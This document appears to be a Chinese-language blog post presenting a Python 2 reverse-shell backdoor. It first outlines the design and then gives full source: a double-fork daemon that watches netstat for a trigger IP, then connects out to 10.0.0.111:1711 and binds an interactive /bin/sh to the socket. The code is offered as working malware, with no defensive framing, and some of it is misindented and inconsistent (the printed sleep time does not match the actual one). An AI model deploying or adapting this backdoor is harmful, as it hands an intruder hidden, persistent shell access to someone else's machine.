python 反向连接后门

1)首先daemon化2)然后用 netstat命令，检测是否指定的IP(192.168.1.111)连接上，有，则激活无，则睡眠几分钟（这个时间可根据需要自行调节)3)激活后，开一个子进程，创建socket，与运行了监听程序的IP进行连接，并执行一个shell，将该shell的输入输出重定向到socket.4)父进程则等待 shell子进程的执行，如果执行完毕，就继续 检测周而复始…

#!/usr/bin/python   import os  import sys  import socket  import time   def daemon ():      try:          pid = os.fork()          if pid > 0:              sys.exit(0)      except OSError, e:          print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)          sys.exit(1)       os.chdir("/")      os.setsid()      os.umask(0)        try:          pid = os.fork()          if pid > 0:              print "Daemon PID %d" % pid              sys.exit(0)      except OSError, e:          print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)          sys.exit(1)    def shell (host = '10.0.0.111', port = 1711):      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)      try:          s.connect((host, port))          f = s.fileno()          os.dup2(f, 0)          os.dup2(f, 1)          os.dup2(f, 2)          os.execl("/bin/sh", "sh", "-i")       except socket.error, (errno, errstr):          print "connect error%d\n" % os.getpid()          time.sleep(10)       sys.exit(127)   if __name__ == "__main__":      daemon()       while(True):          (cin, cout) = os.popen4("netstat -nt | grep 192.168.1.111")          str = cout.read()      try:          os.wait()      except OSError, e:          pass          if  str != '':              print str              try:                  pid = os.fork()                  if pid > 0:                      print 'parent wait:%d\n' % os.getpid()                      try:                          os.wait()                      except OSError, e:                          pass                 else:                      print 'ready to connect:%d\n' % os.getpid()                      shell()               except OSError, e:                  sys.exit(1)          else:              print "start sleep 5 mins:%d\n" % os.getpid()              time.sleep(10)